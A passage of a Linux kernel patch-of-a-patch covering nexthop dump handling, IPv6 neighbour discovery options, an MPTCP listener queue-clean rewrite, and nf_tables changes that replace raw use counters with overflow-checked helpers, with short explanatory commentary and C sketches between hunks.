+-out_err:
+-	dd->ctx->bucket_index = bucket_index;
+-	return err;
++	return 0;
+ }
+ 
+ static int rtm_dump_nexthop_bucket_cb(struct sk_buff *skb,
+@@ -3434,13 +3424,9 @@ static int rtm_dump_nexthop_bucket(struct sk_buff *skb,
+ 
+ 	if (err < 0) {
+ 		if (likely(skb->len))
+-			goto out;
+-		goto out_err;
++			err = skb->len;
+ 	}
+ 
+-out:
+-	err = skb->len;
+-out_err:
+ 	cb->seq = net->nexthop.seq;
+ 	nl_dump_check_consistent(cb, nlmsg_hdr(skb));
+ 	return err;
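
The rewritten dump paths above keep the netlink convention that a partially filled buffer is reported as progress rather than as an error, while saving the bucket index in the dump context so a resumed dump continues instead of restarting, and hence looping, at the maximum nexthop ID. The return-value convention, reduced to a sketch (names hypothetical):

/* 'written' plays the role of skb->len after this dump pass. */
static int dump_pass_result(int err, int written)
{
	if (err < 0 && written > 0)
		return written;	/* partial buffer: userspace asks again */
	return err;		/* empty buffer: surface the real error */
}
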
+diff --git a/net/ipv6/ndisc.c b/net/ipv6/ndisc.c
+index 3a553494ff164..a4d43eb45a9de 100644
+--- a/net/ipv6/ndisc.c
++++ b/net/ipv6/ndisc.c
+@@ -197,7 +197,8 @@ static struct nd_opt_hdr *ndisc_next_option(struct nd_opt_hdr *cur,
+ static inline int ndisc_is_useropt(const struct net_device *dev,
+ 				   struct nd_opt_hdr *opt)
+ {
+-	return opt->nd_opt_type == ND_OPT_RDNSS ||
++	return opt->nd_opt_type == ND_OPT_PREFIX_INFO ||
++		opt->nd_opt_type == ND_OPT_RDNSS ||
+ 		opt->nd_opt_type == ND_OPT_DNSSL ||
+ 		opt->nd_opt_type == ND_OPT_CAPTIVE_PORTAL ||
+ 		opt->nd_opt_type == ND_OPT_PREF64 ||
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index f6f2e6417dcbe..61fefa1a82db2 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2367,7 +2367,7 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 
+ 	lock_sock_nested(ssk, SINGLE_DEPTH_NESTING);
+ 
+-	if (flags & MPTCP_CF_FASTCLOSE) {
++	if ((flags & MPTCP_CF_FASTCLOSE) && !__mptcp_check_fallback(msk)) {
+ 		/* be sure to force the tcp_disconnect() path,
+ 		 * to generate the egress reset
+ 		 */
+@@ -3370,7 +3370,7 @@ static void mptcp_release_cb(struct sock *sk)
+ 
+ 	if (__test_and_clear_bit(MPTCP_CLEAN_UNA, &msk->cb_flags))
+ 		__mptcp_clean_una_wakeup(sk);
+-	if (unlikely(&msk->cb_flags)) {
++	if (unlikely(msk->cb_flags)) {
+ 		/* be sure to set the current sk state before tacking actions
+ 		 * depending on sk_state, that is processing MPTCP_ERROR_REPORT
+ 		 */
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index fc00dd587a297..d77b25636125b 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -312,7 +312,6 @@ struct mptcp_sock {
+ 
+ 	u32 setsockopt_seq;
+ 	char		ca_name[TCP_CA_NAME_MAX];
+-	struct mptcp_sock	*dl_next;
+ };
+ 
+ #define mptcp_data_lock(sk) spin_lock_bh(&(sk)->sk_lock.slock)
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 047e46dd028dd..52a747a80e88e 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1724,16 +1724,31 @@ static void subflow_state_change(struct sock *sk)
+ void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_ssk)
+ {
+ 	struct request_sock_queue *queue = &inet_csk(listener_ssk)->icsk_accept_queue;
+-	struct mptcp_sock *msk, *next, *head = NULL;
+-	struct request_sock *req;
+-	struct sock *sk;
++	struct request_sock *req, *head, *tail;
++	struct mptcp_subflow_context *subflow;
++	struct sock *sk, *ssk;
+ 
+-	/* build a list of all unaccepted mptcp sockets */
++	/* Due to lock dependencies no relevant lock can be acquired under rskq_lock.
++	 * Splice the req list, so that accept() can not reach the pending ssk after
++	 * the listener socket is released below.
++	 */
+ 	spin_lock_bh(&queue->rskq_lock);
+-	for (req = queue->rskq_accept_head; req; req = req->dl_next) {
+-		struct mptcp_subflow_context *subflow;
+-		struct sock *ssk = req->sk;
++	head = queue->rskq_accept_head;
++	tail = queue->rskq_accept_tail;
++	queue->rskq_accept_head = NULL;
++	queue->rskq_accept_tail = NULL;
++	spin_unlock_bh(&queue->rskq_lock);
++
++	if (!head)
++		return;
+ 
++	/* can't acquire the msk socket lock under the subflow one,
++	 * or will cause ABBA deadlock
++	 */
++	release_sock(listener_ssk);
++
++	for (req = head; req; req = req->dl_next) {
++		ssk = req->sk;
+ 		if (!sk_is_mptcp(ssk))
+ 			continue;
+ 
+@@ -1741,32 +1756,10 @@ void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_s
+ 		if (!subflow || !subflow->conn)
+ 			continue;
+ 
+-		/* skip if already in list */
+ 		sk = subflow->conn;
+-		msk = mptcp_sk(sk);
+-		if (msk->dl_next || msk == head)
+-			continue;
+-
+ 		sock_hold(sk);
+-		msk->dl_next = head;
+-		head = msk;
+-	}
+-	spin_unlock_bh(&queue->rskq_lock);
+-	if (!head)
+-		return;
+-
+-	/* can't acquire the msk socket lock under the subflow one,
+-	 * or will cause ABBA deadlock
+-	 */
+-	release_sock(listener_ssk);
+-
+-	for (msk = head; msk; msk = next) {
+-		sk = (struct sock *)msk;
+ 
+ 		lock_sock_nested(sk, SINGLE_DEPTH_NESTING);
+-		next = msk->dl_next;
+-		msk->dl_next = NULL;
+-
+ 		__mptcp_unaccepted_force_close(sk);
+ 		release_sock(sk);
+ 
+@@ -1790,6 +1783,13 @@ void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_s
+ 
+ 	/* we are still under the listener msk socket lock */
+ 	lock_sock_nested(listener_ssk, SINGLE_DEPTH_NESTING);
++
++	/* restore the listener queue, to let the TCP code clean it up */
++	spin_lock_bh(&queue->rskq_lock);
++	WARN_ON_ONCE(queue->rskq_accept_head);
++	queue->rskq_accept_head = head;
++	queue->rskq_accept_tail = tail;
++	spin_unlock_bh(&queue->rskq_lock);
+ }
+ 
+ static int subflow_ulp_init(struct sock *sk)
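
The queue-clean rewrite above is an instance of a general shape: detach the whole list under its spinlock, drop every lock before walking it (so per-entry locks can be taken without ABBA ordering problems), then splice the list back for its owner to reap. A user-space sketch of that shape, assuming pthread spinlocks; nothing here is MPTCP API:

#include <pthread.h>

struct req {
	struct req *next;
};

struct queue {
	pthread_spinlock_t lock;
	struct req *head, *tail;
};

void queue_clean(struct queue *q, void (*handle)(struct req *))
{
	struct req *head, *tail, *r;

	/* detach everything in one shot under the spinlock */
	pthread_spin_lock(&q->lock);
	head = q->head;
	tail = q->tail;
	q->head = q->tail = NULL;
	pthread_spin_unlock(&q->lock);

	if (!head)
		return;

	/* no locks held: per-entry locks can be taken in any order */
	for (r = head; r; r = r->next)
		handle(r);

	/* splice the list back so its owner can clean it up normally */
	pthread_spin_lock(&q->lock);
	q->head = head;
	q->tail = tail;
	pthread_spin_unlock(&q->lock);
}
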
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index dd57a9ebe113d..f6e6273838859 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -255,8 +255,10 @@ int nf_tables_bind_chain(const struct nft_ctx *ctx, struct nft_chain *chain)
+ 	if (chain->bound)
+ 		return -EBUSY;
+ 
++	if (!nft_use_inc(&chain->use))
++		return -EMFILE;
++
+ 	chain->bound = true;
+-	chain->use++;
+ 	nft_chain_trans_bind(ctx, chain);
+ 
+ 	return 0;
+@@ -439,7 +441,7 @@ static int nft_delchain(struct nft_ctx *ctx)
+ 	if (IS_ERR(trans))
+ 		return PTR_ERR(trans);
+ 
+-	ctx->table->use--;
++	nft_use_dec(&ctx->table->use);
+ 	nft_deactivate_next(ctx->net, ctx->chain);
+ 
+ 	return 0;
+@@ -478,7 +480,7 @@ nf_tables_delrule_deactivate(struct nft_ctx *ctx, struct nft_rule *rule)
+ 	/* You cannot delete the same rule twice */
+ 	if (nft_is_active_next(ctx->net, rule)) {
+ 		nft_deactivate_next(ctx->net, rule);
+-		ctx->chain->use--;
++		nft_use_dec(&ctx->chain->use);
+ 		return 0;
+ 	}
+ 	return -ENOENT;
+@@ -645,7 +647,7 @@ static int nft_delset(const struct nft_ctx *ctx, struct nft_set *set)
+ 		nft_map_deactivate(ctx, set);
+ 
+ 	nft_deactivate_next(ctx->net, set);
+-	ctx->table->use--;
++	nft_use_dec(&ctx->table->use);
+ 
+ 	return err;
+ }
+@@ -677,7 +679,7 @@ static int nft_delobj(struct nft_ctx *ctx, struct nft_object *obj)
+ 		return err;
+ 
+ 	nft_deactivate_next(ctx->net, obj);
+-	ctx->table->use--;
++	nft_use_dec(&ctx->table->use);
+ 
+ 	return err;
+ }
+@@ -712,7 +714,7 @@ static int nft_delflowtable(struct nft_ctx *ctx,
+ 		return err;
+ 
+ 	nft_deactivate_next(ctx->net, flowtable);
+-	ctx->table->use--;
++	nft_use_dec(&ctx->table->use);
+ 
+ 	return err;
+ }
+@@ -2358,9 +2360,6 @@ static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
+ 	unsigned int data_size;
+ 	int err;
+ 
+-	if (table->use == UINT_MAX)
+-		return -EOVERFLOW;
+-
+ 	if (nla[NFTA_CHAIN_HOOK]) {
+ 		struct nft_stats __percpu *stats = NULL;
+ 		struct nft_chain_hook hook;
+@@ -2457,6 +2456,11 @@ static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
+ 	if (err < 0)
+ 		goto err_destroy_chain;
+ 
++	if (!nft_use_inc(&table->use)) {
++		err = -EMFILE;
++		goto err_use;
++	}
++
+ 	trans = nft_trans_chain_add(ctx, NFT_MSG_NEWCHAIN);
+ 	if (IS_ERR(trans)) {
+ 		err = PTR_ERR(trans);
+@@ -2473,10 +2477,11 @@ static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
+ 		goto err_unregister_hook;
+ 	}
+ 
+-	table->use++;
+-
+ 	return 0;
++
+ err_unregister_hook:
++	nft_use_dec_restore(&table->use);
++err_use:
+ 	nf_tables_unregister_hook(net, table, chain);
+ err_destroy_chain:
+ 	nf_tables_chain_destroy(ctx);
+@@ -3663,9 +3668,6 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 			return -EINVAL;
+ 		handle = nf_tables_alloc_handle(table);
+ 
+-		if (chain->use == UINT_MAX)
+-			return -EOVERFLOW;
+-
+ 		if (nla[NFTA_RULE_POSITION]) {
+ 			pos_handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_POSITION]));
+ 			old_rule = __nft_rule_lookup(chain, pos_handle);
+@@ -3759,6 +3761,11 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 		}
+ 	}
+ 
++	if (!nft_use_inc(&chain->use)) {
++		err = -EMFILE;
++		goto err_release_rule;
++	}
++
+ 	if (info->nlh->nlmsg_flags & NLM_F_REPLACE) {
+ 		err = nft_delrule(&ctx, old_rule);
+ 		if (err < 0)
+@@ -3790,7 +3797,6 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 		}
+ 	}
+ 	kvfree(expr_info);
+-	chain->use++;
+ 
+ 	if (flow)
+ 		nft_trans_flow_rule(trans) = flow;
+@@ -3801,6 +3807,7 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 	return 0;
+ 
+ err_destroy_flow_rule:
++	nft_use_dec_restore(&chain->use);
+ 	if (flow)
+ 		nft_flow_rule_destroy(flow);
+ err_release_rule:
+@@ -4818,9 +4825,15 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 	alloc_size = sizeof(*set) + size + udlen;
+ 	if (alloc_size < size || alloc_size > INT_MAX)
+ 		return -ENOMEM;
++
++	if (!nft_use_inc(&table->use))
++		return -EMFILE;
++
+ 	set = kvzalloc(alloc_size, GFP_KERNEL_ACCOUNT);
+-	if (!set)
+-		return -ENOMEM;
++	if (!set) {
++		err = -ENOMEM;
++		goto err_alloc;
++	}
+ 
+ 	name = nla_strdup(nla[NFTA_SET_NAME], GFP_KERNEL_ACCOUNT);
+ 	if (!name) {
+@@ -4878,7 +4891,7 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 		goto err_set_expr_alloc;
+ 
+ 	list_add_tail_rcu(&set->list, &table->sets);
+-	table->use++;
++
+ 	return 0;
+ 
+ err_set_expr_alloc:
+@@ -4890,6 +4903,9 @@ err_set_init:
+ 	kfree(set->name);
+ err_set_name:
+ 	kvfree(set);
++err_alloc:
++	nft_use_dec_restore(&table->use);
++
+ 	return err;
+ }
+ 
+@@ -5024,9 +5040,6 @@ int nf_tables_bind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 	struct nft_set_binding *i;
+ 	struct nft_set_iter iter;
+ 
+-	if (set->use == UINT_MAX)
+-		return -EOVERFLOW;
+-
+ 	if (!list_empty(&set->bindings) && nft_set_is_anonymous(set))
+ 		return -EBUSY;
+ 
+@@ -5054,10 +5067,12 @@ int nf_tables_bind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			return iter.err;
+ 	}
+ bind:
++	if (!nft_use_inc(&set->use))
++		return -EMFILE;
++
+ 	binding->chain = ctx->chain;
+ 	list_add_tail_rcu(&binding->list, &set->bindings);
+ 	nft_set_trans_bind(ctx, set);
+-	set->use++;
+ 
+ 	return 0;
+ }
+@@ -5131,7 +5146,7 @@ void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set)
+ 		nft_clear(ctx->net, set);
+ 	}
+ 
+-	set->use++;
++	nft_use_inc_restore(&set->use);
+ }
+ EXPORT_SYMBOL_GPL(nf_tables_activate_set);
+ 
+@@ -5147,7 +5162,7 @@ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 		else
+ 			list_del_rcu(&binding->list);
+ 
+-		set->use--;
++		nft_use_dec(&set->use);
+ 		break;
+ 	case NFT_TRANS_PREPARE:
+ 		if (nft_set_is_anonymous(set)) {
+@@ -5156,7 +5171,7 @@ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 
+ 			nft_deactivate_next(ctx->net, set);
+ 		}
+-		set->use--;
++		nft_use_dec(&set->use);
+ 		return;
+ 	case NFT_TRANS_ABORT:
+ 	case NFT_TRANS_RELEASE:
+@@ -5164,7 +5179,7 @@ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 		    set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
+ 			nft_map_deactivate(ctx, set);
+ 
+-		set->use--;
++		nft_use_dec(&set->use);
+ 		fallthrough;
+ 	default:
+ 		nf_tables_unbind_set(ctx, set, binding,
+@@ -5933,7 +5948,7 @@ void nft_set_elem_destroy(const struct nft_set *set, void *elem,
+ 		nft_set_elem_expr_destroy(&ctx, nft_set_ext_expr(ext));
+ 
+ 	if (nft_set_ext_exists(ext, NFT_SET_EXT_OBJREF))
+-		(*nft_set_ext_obj(ext))->use--;
++		nft_use_dec(&(*nft_set_ext_obj(ext))->use);
+ 	kfree(elem);
+ }
+ EXPORT_SYMBOL_GPL(nft_set_elem_destroy);
+@@ -6435,8 +6450,16 @@ static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
+ 				     set->objtype, genmask);
+ 		if (IS_ERR(obj)) {
+ 			err = PTR_ERR(obj);
++			obj = NULL;
+ 			goto err_parse_key_end;
+ 		}
++
++		if (!nft_use_inc(&obj->use)) {
++			err = -EMFILE;
++			obj = NULL;
++			goto err_parse_key_end;
++		}
++
+ 		err = nft_set_ext_add(&tmpl, NFT_SET_EXT_OBJREF);
+ 		if (err < 0)
+ 			goto err_parse_key_end;
+@@ -6505,10 +6528,9 @@ static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
+ 	if (flags)
+ 		*nft_set_ext_flags(ext) = flags;
+ 
+-	if (obj) {
++	if (obj)
+ 		*nft_set_ext_obj(ext) = obj;
+-		obj->use++;
+-	}
++
+ 	if (ulen > 0) {
+ 		if (nft_set_ext_check(&tmpl, NFT_SET_EXT_USERDATA, ulen) < 0) {
+ 			err = -EINVAL;
+@@ -6573,12 +6595,13 @@ err_element_clash:
+ 	kfree(trans);
+ err_elem_free:
+ 	nf_tables_set_elem_destroy(ctx, set, elem.priv);
+-	if (obj)
+-		obj->use--;
+ err_parse_data:
+ 	if (nla[NFTA_SET_ELEM_DATA] != NULL)
+ 		nft_data_release(&elem.data.val, desc.type);
+ err_parse_key_end:
++	if (obj)
++		nft_use_dec_restore(&obj->use);
++
+ 	nft_data_release(&elem.key_end.val, NFT_DATA_VALUE);
+ err_parse_key:
+ 	nft_data_release(&elem.key.val, NFT_DATA_VALUE);
+@@ -6659,7 +6682,7 @@ void nft_data_hold(const struct nft_data *data, enum nft_data_types type)
+ 		case NFT_JUMP:
+ 		case NFT_GOTO:
+ 			chain = data->verdict.chain;
+-			chain->use++;
++			nft_use_inc_restore(&chain->use);
+ 			break;
+ 		}
+ 	}
+@@ -6674,7 +6697,7 @@ static void nft_setelem_data_activate(const struct net *net,
+ 	if (nft_set_ext_exists(ext, NFT_SET_EXT_DATA))
+ 		nft_data_hold(nft_set_ext_data(ext), set->dtype);
+ 	if (nft_set_ext_exists(ext, NFT_SET_EXT_OBJREF))
+-		(*nft_set_ext_obj(ext))->use++;
++		nft_use_inc_restore(&(*nft_set_ext_obj(ext))->use);
+ }
+ 
+ static void nft_setelem_data_deactivate(const struct net *net,
+@@ -6686,7 +6709,7 @@ static void nft_setelem_data_deactivate(const struct net *net,
+ 	if (nft_set_ext_exists(ext, NFT_SET_EXT_DATA))
+ 		nft_data_release(nft_set_ext_data(ext), set->dtype);
+ 	if (nft_set_ext_exists(ext, NFT_SET_EXT_OBJREF))
+-		(*nft_set_ext_obj(ext))->use--;
++		nft_use_dec(&(*nft_set_ext_obj(ext))->use);
+ }
+ 
+ static int nft_del_setelem(struct nft_ctx *ctx, struct nft_set *set,
+@@ -7225,9 +7248,14 @@ static int nf_tables_newobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 
+ 	nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+ 
++	if (!nft_use_inc(&table->use))
++		return -EMFILE;
++
+ 	type = nft_obj_type_get(net, objtype);
+-	if (IS_ERR(type))
+-		return PTR_ERR(type);
++	if (IS_ERR(type)) {
++		err = PTR_ERR(type);
++		goto err_type;
++	}
+ 
+ 	obj = nft_obj_init(&ctx, type, nla[NFTA_OBJ_DATA]);
+ 	if (IS_ERR(obj)) {
+@@ -7261,7 +7289,7 @@ static int nf_tables_newobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 		goto err_obj_ht;
+ 
+ 	list_add_tail_rcu(&obj->list, &table->objects);
+-	table->use++;
++
+ 	return 0;
+ err_obj_ht:
+ 	/* queued in transaction log */
+@@ -7277,6 +7305,9 @@ err_strdup:
+ 	kfree(obj);
+ err_init:
+ 	module_put(type->owner);
++err_type:
++	nft_use_dec_restore(&table->use);
++
+ 	return err;
+ }
+ 
+@@ -7667,7 +7698,7 @@ void nf_tables_deactivate_flowtable(const struct nft_ctx *ctx,
+ 	case NFT_TRANS_PREPARE:
+ 	case NFT_TRANS_ABORT:
+ 	case NFT_TRANS_RELEASE:
+-		flowtable->use--;
++		nft_use_dec(&flowtable->use);
+ 		fallthrough;
+ 	default:
+ 		return;
+@@ -8015,9 +8046,14 @@ static int nf_tables_newflowtable(struct sk_buff *skb,
+ 
+ 	nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+ 
++	if (!nft_use_inc(&table->use))
++		return -EMFILE;
++
+ 	flowtable = kzalloc(sizeof(*flowtable), GFP_KERNEL_ACCOUNT);
+-	if (!flowtable)
+-		return -ENOMEM;
++	if (!flowtable) {
++		err = -ENOMEM;
++		goto flowtable_alloc;
++	}
+ 
+ 	flowtable->table = table;
+ 	flowtable->handle = nf_tables_alloc_handle(table);
+@@ -8072,7 +8108,6 @@ static int nf_tables_newflowtable(struct sk_buff *skb,
+ 		goto err5;
+ 
+ 	list_add_tail_rcu(&flowtable->list, &table->flowtables);
+-	table->use++;
+ 
+ 	return 0;
+ err5:
+@@ -8089,6 +8124,9 @@ err2:
+ 	kfree(flowtable->name);
+ err1:
+ 	kfree(flowtable);
++flowtable_alloc:
++	nft_use_dec_restore(&table->use);
++
+ 	return err;
+ }
+ 
+@@ -9374,7 +9412,7 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 				 */
+ 				if (nft_set_is_anonymous(nft_trans_set(trans)) &&
+ 				    !list_empty(&nft_trans_set(trans)->bindings))
+-					trans->ctx.table->use--;
++					nft_use_dec(&trans->ctx.table->use);
+ 			}
+ 			nf_tables_set_notify(&trans->ctx, nft_trans_set(trans),
+ 					     NFT_MSG_NEWSET, GFP_KERNEL);
+@@ -9593,7 +9631,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 					nft_trans_destroy(trans);
+ 					break;
+ 				}
+-				trans->ctx.table->use--;
++				nft_use_dec_restore(&trans->ctx.table->use);
+ 				nft_chain_del(trans->ctx.chain);
+ 				nf_tables_unregister_hook(trans->ctx.net,
+ 							  trans->ctx.table,
+@@ -9601,7 +9639,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 			}
+ 			break;
+ 		case NFT_MSG_DELCHAIN:
+-			trans->ctx.table->use++;
++			nft_use_inc_restore(&trans->ctx.table->use);
+ 			nft_clear(trans->ctx.net, trans->ctx.chain);
+ 			nft_trans_destroy(trans);
+ 			break;
+@@ -9610,7 +9648,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 				nft_trans_destroy(trans);
+ 				break;
+ 			}
+-			trans->ctx.chain->use--;
++			nft_use_dec_restore(&trans->ctx.chain->use);
+ 			list_del_rcu(&nft_trans_rule(trans)->list);
+ 			nft_rule_expr_deactivate(&trans->ctx,
+ 						 nft_trans_rule(trans),
+@@ -9619,7 +9657,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 				nft_flow_rule_destroy(nft_trans_flow_rule(trans));
+ 			break;
+ 		case NFT_MSG_DELRULE:
+-			trans->ctx.chain->use++;
++			nft_use_inc_restore(&trans->ctx.chain->use);
+ 			nft_clear(trans->ctx.net, nft_trans_rule(trans));
+ 			nft_rule_expr_activate(&trans->ctx, nft_trans_rule(trans));
+ 			if (trans->ctx.chain->flags & NFT_CHAIN_HW_OFFLOAD)
+@@ -9632,7 +9670,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 				nft_trans_destroy(trans);
+ 				break;
+ 			}
+-			trans->ctx.table->use--;
++			nft_use_dec_restore(&trans->ctx.table->use);
+ 			if (nft_trans_set_bound(trans)) {
+ 				nft_trans_destroy(trans);
+ 				break;
+@@ -9640,7 +9678,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 			list_del_rcu(&nft_trans_set(trans)->list);
+ 			break;
+ 		case NFT_MSG_DELSET:
+-			trans->ctx.table->use++;
++			nft_use_inc_restore(&trans->ctx.table->use);
+ 			nft_clear(trans->ctx.net, nft_trans_set(trans));
+ 			if (nft_trans_set(trans)->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
+ 				nft_map_activate(&trans->ctx, nft_trans_set(trans));
+@@ -9683,12 +9721,12 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 				nft_obj_destroy(&trans->ctx, nft_trans_obj_newobj(trans));
+ 				nft_trans_destroy(trans);
+ 			} else {
+-				trans->ctx.table->use--;
++				nft_use_dec_restore(&trans->ctx.table->use);
+ 				nft_obj_del(nft_trans_obj(trans));
+ 			}
+ 			break;
+ 		case NFT_MSG_DELOBJ:
+-			trans->ctx.table->use++;
++			nft_use_inc_restore(&trans->ctx.table->use);
+ 			nft_clear(trans->ctx.net, nft_trans_obj(trans));
+ 			nft_trans_destroy(trans);
+ 			break;
+@@ -9697,7 +9735,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 				nft_unregister_flowtable_net_hooks(net,
+ 						&nft_trans_flowtable_hooks(trans));
+ 			} else {
+-				trans->ctx.table->use--;
++				nft_use_dec_restore(&trans->ctx.table->use);
+ 				list_del_rcu(&nft_trans_flowtable(trans)->list);
+ 				nft_unregister_flowtable_net_hooks(net,
+ 						&nft_trans_flowtable(trans)->hook_list);
+@@ -9708,7 +9746,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 				list_splice(&nft_trans_flowtable_hooks(trans),
+ 					    &nft_trans_flowtable(trans)->hook_list);
+ 			} else {
+-				trans->ctx.table->use++;
++				nft_use_inc_restore(&trans->ctx.table->use);
+ 				nft_clear(trans->ctx.net, nft_trans_flowtable(trans));
+ 			}
+ 			nft_trans_destroy(trans);
+@@ -10161,8 +10199,9 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
+ 		if (desc->flags & NFT_DATA_DESC_SETELEM &&
+ 		    chain->flags & NFT_CHAIN_BINDING)
+ 			return -EINVAL;
++		if (!nft_use_inc(&chain->use))
++			return -EMFILE;
+ 
+-		chain->use++;
+ 		data->verdict.chain = chain;
+ 		break;
+ 	}
+@@ -10180,7 +10219,7 @@ static void nft_verdict_uninit(const struct nft_data *data)
+ 	case NFT_JUMP:
+ 	case NFT_GOTO:
+ 		chain = data->verdict.chain;
+-		chain->use--;
++		nft_use_dec(&chain->use);
+ 		break;
+ 	}
+ }
+@@ -10349,11 +10388,11 @@ int __nft_release_basechain(struct nft_ctx *ctx)
+ 	nf_tables_unregister_hook(ctx->net, ctx->chain->table, ctx->chain);
+ 	list_for_each_entry_safe(rule, nr, &ctx->chain->rules, list) {
+ 		list_del(&rule->list);
+-		ctx->chain->use--;
++		nft_use_dec(&ctx->chain->use);
+ 		nf_tables_rule_release(ctx, rule);
+ 	}
+ 	nft_chain_del(ctx->chain);
+-	ctx->table->use--;
++	nft_use_dec(&ctx->table->use);
+ 	nf_tables_chain_destroy(ctx);
+ 
+ 	return 0;
+@@ -10406,18 +10445,18 @@ static void __nft_release_table(struct net *net, struct nft_table *table)
+ 		ctx.chain = chain;
+ 		list_for_each_entry_safe(rule, nr, &chain->rules, list) {
+ 			list_del(&rule->list);
+-			chain->use--;
++			nft_use_dec(&chain->use);
+ 			nf_tables_rule_release(&ctx, rule);
+ 		}
+ 	}
+ 	list_for_each_entry_safe(flowtable, nf, &table->flowtables, list) {
+ 		list_del(&flowtable->list);
+-		table->use--;
++		nft_use_dec(&table->use);
+ 		nf_tables_flowtable_destroy(flowtable);
+ 	}
+ 	list_for_each_entry_safe(set, ns, &table->sets, list) {
+ 		list_del(&set->list);
+-		table->use--;
++		nft_use_dec(&table->use);
+ 		if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
+ 			nft_map_deactivate(&ctx, set);
+ 
+@@ -10425,13 +10464,13 @@ static void __nft_release_table(struct net *net, struct nft_table *table)
+ 	}
+ 	list_for_each_entry_safe(obj, ne, &table->objects, list) {
+ 		nft_obj_del(obj);
+-		table->use--;
++		nft_use_dec(&table->use);
+ 		nft_obj_destroy(&ctx, obj);
+ 	}
+ 	list_for_each_entry_safe(chain, nc, &table->chains, list) {
+ 		ctx.chain = chain;
+ 		nft_chain_del(chain);
+-		table->use--;
++		nft_use_dec(&table->use);
+ 		nf_tables_chain_destroy(&ctx);
+ 	}
+ 	nf_tables_table_destroy(&ctx);
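
All of the use++/use-- conversions above funnel through small helpers added in include/net/netfilter/nf_tables.h, which this excerpt does not show. Judging from the call sites, their contract is a bounded counter whose increment can fail (the caller then returns -EMFILE) instead of silently wrapping; one plausible shape, offered only as a reading aid and with an assumed ceiling:

#include <stdbool.h>
#include <limits.h>

#define USE_MAX	UINT_MAX	/* assumed bound; the real helpers may differ */

static inline bool nft_use_inc_sketch(unsigned int *use)
{
	if (*use == USE_MAX)
		return false;	/* caller reports -EMFILE */
	(*use)++;
	return true;
}

static inline void nft_use_dec_sketch(unsigned int *use)
{
	/* decrementing from 0 here would indicate a refcount bug */
	(*use)--;
}
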
+diff --git a/net/netfilter/nft_flow_offload.c b/net/netfilter/nft_flow_offload.c
+index a25c88bc8b750..8a43f6f9c90b6 100644
+--- a/net/netfilter/nft_flow_offload.c
++++ b/net/netfilter/nft_flow_offload.c
+@@ -404,8 +404,10 @@ static int nft_flow_offload_init(const struct nft_ctx *ctx,
+ 	if (IS_ERR(flowtable))
+ 		return PTR_ERR(flowtable);
+ 
++	if (!nft_use_inc(&flowtable->use))
++		return -EMFILE;
++
+ 	priv->flowtable = flowtable;
+-	flowtable->use++;
+ 
+ 	return nf_ct_netns_get(ctx->net, ctx->family);
+ }
+@@ -424,7 +426,7 @@ static void nft_flow_offload_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_flow_offload *priv = nft_expr_priv(expr);
+ 
+-	priv->flowtable->use++;
++	nft_use_inc_restore(&priv->flowtable->use);
+ }
+ 
+ static void nft_flow_offload_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_immediate.c b/net/netfilter/nft_immediate.c
+index 391c18e4b3ebd..5f59dbab3e933 100644
+--- a/net/netfilter/nft_immediate.c
++++ b/net/netfilter/nft_immediate.c
